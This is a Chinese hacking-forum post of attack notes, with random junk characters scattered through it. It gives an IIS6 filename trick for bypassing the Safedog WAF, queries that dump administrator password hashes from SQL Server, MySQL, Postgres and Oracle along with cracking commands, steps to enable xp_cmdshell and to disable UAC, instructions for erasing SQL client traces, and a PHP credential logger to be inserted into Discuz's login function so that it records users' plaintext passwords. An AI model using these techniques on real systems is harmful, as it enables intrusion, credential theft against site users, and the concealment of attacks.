- h9 d9 U$ Q! g% E利用II6文件解析漏洞绕过安全狗代码:
/ }" j, M% @) d- @;antian365.asp;antian365.jpg
7 B! a. ^* n% O* Y1 ^/ C
: K0 O% O6 }- N1 `3 @8 h& f0 D! @# q$ j各种类型数据库抓HASH破解最高权限密码!
* w# c3 U0 d: r- z& N" R% G1.sql server2000( Q+ o# q5 Z# _+ S0 R; [
SELECT password from master.dbo.sysxlogins where name='sa'
" y Z3 V: A: Z% x0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
6 r3 W; @! W I. r$ b- c" }' s2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
+ a4 T, _$ s- v1 C) W1 D! l& A/ E, M& X+ I- C3 `1 K5 c
0×0100- constant header
- j- F: R$ ]0 `. K# N" @. g34767D5C- salt
; F, T" i$ b9 N3 u% o, n0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash& F/ g1 D, z- q9 m V
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
0 N: k, a( [$ m/ @/ U: V* i3 Hcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash& R5 L) g) H/ b! Q+ V9 E' a( o0 j
SQL server 2005:-* }* ^, w5 k. K% z7 M
SELECT password_hash FROM sys.sql_logins where name='sa'7 \. E: ]9 `" @4 Q. d2 o
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
* B x; M- Y8 {3 \. H+ a0×0100- constant header
8 z. }4 Q8 ?( A, c0 {+ _! ]$ z9 M993BF231-salt
8 ~; w, S$ m+ N7 u* d0 i; {: @5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash J2 s5 b3 J. n6 x6 ^2 B* U
crack case sensitive hash in cain, try brute force and dictionary based attacks.8 x& _' Z. `$ U
6 _) B" c- Z E* S+ pupdate:- following bernardo’s comments:-6 i' o$ \9 e N
use function fn_varbintohexstr() to cast password in a hex string.
' f, w7 t$ G1 f' le.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
; O7 T# v0 k8 w, u4 I& e
1 b& f- i( ~/ L! sMYSQL:-
+ x$ n& J9 O2 i) {6 g
! a! O% ~9 t: a1 L0 K# t% bIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.8 ?6 L m4 b. @' A* R
$ }/ Y* h; c1 i: j. n) y% n*mysql < 4.1
' G/ Y5 s. \: _. r9 d0 ]! x3 U2 N, U' _6 O* j% E9 d1 I& c7 ]
mysql> SELECT PASSWORD(‘mypass’);& }7 a2 \: K$ b, q. {
+——————–+( s: l9 b6 V' \% H' ^: o0 e
| PASSWORD(‘mypass’) |' z, E D# d! G# z3 W
+——————–+( J, R1 b* h" O+ Y
| 6f8c114b58f2ce9e |6 t* d8 y! B- h. P, d
+——————–+/ S' R# Y8 V* G1 D; M1 @
1 `, B* S9 d/ Y. T S8 i6 O' H" l7 `*mysql >=4.1# U9 V0 m. H \" Q$ q8 K9 A8 }
' p+ l0 F2 P& P/ X$ Y0 B
mysql> SELECT PASSWORD(‘mypass’);
4 Y( a4 g6 j" o4 _7 i; l' r+——————————————-+- B$ B* g+ e4 W
| PASSWORD(‘mypass’) |! j. R# E, X B, J, v& f2 O. ~
+——————————————-+" Z a) I6 b4 f- E* P8 K. Z
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |9 M8 l0 s9 l& ` j2 o& P
+——————————————-+
8 N/ k6 p9 {8 g; @" B" M* `, \9 Y% k1 B
Select user, password from mysql.user
' ~2 s7 Y# Z1 u4 y+ z3 h' DThe hashes can be cracked in ‘cain and abel’
: s6 Q! @! a+ m; f# ~/ k+ c% t# N: c& A8 _- K
Postgres:-0 w$ c* g1 ~+ @/ W/ G- i' {1 [# y. \
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
- h2 y3 c) m+ `/ N4 fselect usename, passwd from pg_shadow;
2 i% F( _# L, xusename | passwd
" n" K( d- F9 C4 M——————+————————————-) k7 u3 Y9 Y: n1 D, z6 A2 V7 N* r
testuser | md5fabb6d7172aadfda4753bf0507ed43964 l2 T) N8 p! q$ @
use mdcrack to crack these hashes:-
$ f% ~! ]$ D( ]2 y. l' ]$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396; _. b( P9 W: t. y2 [
( ]! s2 ^/ H7 h$ D. _( `7 ZOracle:-
% `2 P4 Q% b4 ]! c+ x+ sselect name, password, spare4 from sys.user$. C: D% D* u, w' e
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g/ P( S: \( H, f( L4 y
More on Oracle later, i am a bit bored….
: g1 g( g' Z# F9 d8 A3 X$ x# _* _7 ]/ U
, {2 h: _3 f) O. | d9 t在sql server2005/2008中开启xp_cmdshell
# g) I' W; x) i- p ~* b! }-- To allow advanced options to be changed.
6 v7 C# P. X% M b' cEXEC sp_configure 'show advanced options', 1' B% D% X/ S. A% y _# e+ m4 ]8 S" O
GO3 n7 N' k/ [) C; ?% W& O7 L
-- To update the currently configured value for advanced options.
: D7 {) h* ? j3 {$ y7 yRECONFIGURE! w" S9 e9 Q& U; _6 e
GO
# p4 L. X/ b4 T6 P1 ^$ f-- To enable the feature.; u- J% w+ J/ J) Q# n
EXEC sp_configure 'xp_cmdshell', 1% ^% u" b! Z9 K" r* L* `3 X1 {
GO
* A) P# ~6 P( [1 D. a$ l7 A-- To update the currently configured value for this feature.
0 @/ A# G8 i6 Y# qRECONFIGURE
1 M% Z* G0 Z2 J7 A" h4 lGO) J v3 H3 A% u' B! U7 W- y
SQL 2008 server日志清除,在清楚前一定要备份。
" ^& `5 W; ]7 C$ U! p如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
4 t$ G L( ~& D. H8 z( I8 N9 _X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
( U( m/ l, l! R( z7 S
3 a) N% L" ?' G: E) F2 r% n6 H对于SQL Server 2008以前的版本:
4 _/ f3 C" O$ ^SQL Server 2005:" k/ D0 T5 `( D/ I6 t
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat- x. I8 M* Q9 k
SQL Server 2000:( ]4 y% d* F* N( I a3 S
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
2 Y1 y- k( J) G- J2 E- I. v& {4 G5 a$ Y, \% i, L9 i
本帖最后由 simeon 于 2013-1-3 09:51 编辑+ P" m. m. X8 H/ {& `3 l
2 o% ~0 f F8 a; _( S7 C
5 o0 p- `5 N' v+ B; o+ h2 ~5 nwindows 2008 文件权限修改
; Q% D8 x* y+ C" C8 G, k1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
9 |9 b( y [( z" m5 p7 O$ x2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98/ J2 s' s* a+ d& A. d
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
1 q! |8 J$ u# s) {! w( ]
% A7 P+ R2 I% V" K) |Windows Registry Editor Version 5.00
" x: f: r3 d6 r. Z$ M: X[HKEY_CLASSES_ROOT\*\shell\runas]4 l2 M6 {# V, U' K
@="管理员取得所有权"& \' i9 C9 D% k' a7 J
"NoWorkingDirectory"=""
0 F$ H0 ?+ `! W: e1 J- ]3 }[HKEY_CLASSES_ROOT\*\shell\runas\command]0 w4 [) l% ]( |; x
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
+ o9 p. u9 ?, }3 W9 v"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
4 S- S8 i7 h; E1 h3 L[HKEY_CLASSES_ROOT\exefile\shell\runas2]
: \# `% }& v0 Z5 i@="管理员取得所有权"# D$ L4 l( C2 g1 _1 ~4 w
"NoWorkingDirectory"="") W% |" V! j: C" [- D4 O
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]6 e% L% y* X3 H+ d; i# c
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
, U# y9 V- @" P( t2 i, ^"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
$ j( k' d8 m; l5 L& y, d& T8 W) @- ~0 y
[HKEY_CLASSES_ROOT\Directory\shell\runas]
9 l5 Q" _6 ^2 ?2 V' F4 R@="管理员取得所有权"
1 |, h( J9 ]( G6 S0 s; ?0 V"NoWorkingDirectory"=""# b4 U4 X' u g" E. C( |
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
' r6 f) @+ X, R. b9 c" I/ A@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"' m7 v9 T+ g2 f: H! b; s
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"* ^( E! M9 X6 o6 u, t
) b/ n$ t) [- z- w8 u5 G
$ ~/ Z( W4 w& o3 G' a$ Iwin7右键“管理员取得所有权”.reg导入
4 H# n; q5 U k7 D二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
) s8 P; J* k5 t" U$ j1、C:\Windows这个路径的“notepad.exe”不需要替换0 H+ ~: \) I/ {2 |+ h& O9 T
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换3 T! K" p; @/ m! Y5 }( c
3、四个“notepad.exe.mui”不要管
: V3 g' a, l) H6 j8 j9 z j4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和9 b# H. o4 C* U0 H X( m
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”5 R1 K) ^: K6 x* D/ H
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,4 v6 b% ^1 w D
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。: K c2 [0 V2 ]9 I
windows 2008中关闭安全策略:
! e3 N9 {9 o. F$ j3 ]reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
. O9 [ J! q& x" O/ G9 a% g修改uc_client目录下的client.php 在, V; g. |& `$ w6 x$ a) C
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {) d0 W! n# i$ z
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
9 W; H$ L0 ^" a+ N$ ^你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw _* z/ g! k# W8 S+ U, t
if(getenv('HTTP_CLIENT_IP')) {
& x- n3 d" T; {# o) f0 i" a+ N+ n$onlineip = getenv('HTTP_CLIENT_IP');4 m }& z* E1 }, i- ^0 D
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
4 s; i$ o: Z; l$onlineip = getenv('HTTP_X_FORWARDED_FOR');5 I8 `; o6 Y+ H6 ^8 y! z
} elseif(getenv('REMOTE_ADDR')) {
) X7 B& U. I/ B! J; K3 m1 A7 ?9 F$onlineip = getenv('REMOTE_ADDR');$ {& T- y9 T# |6 X m( o
} else {" T2 t, w. d3 W
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
/ C& N1 S: m: i4 m- \9 k}* B' ]$ q& A% W' J" {3 L5 E7 u
$showtime=date("Y-m-d H:i:s");
5 s1 g7 Y X! b3 c $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
8 `6 s- i1 C2 j( c7 l $handle=fopen('./data/cache/csslog.php','a+');
9 S* y. `$ Z7 t. m) q. C $write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对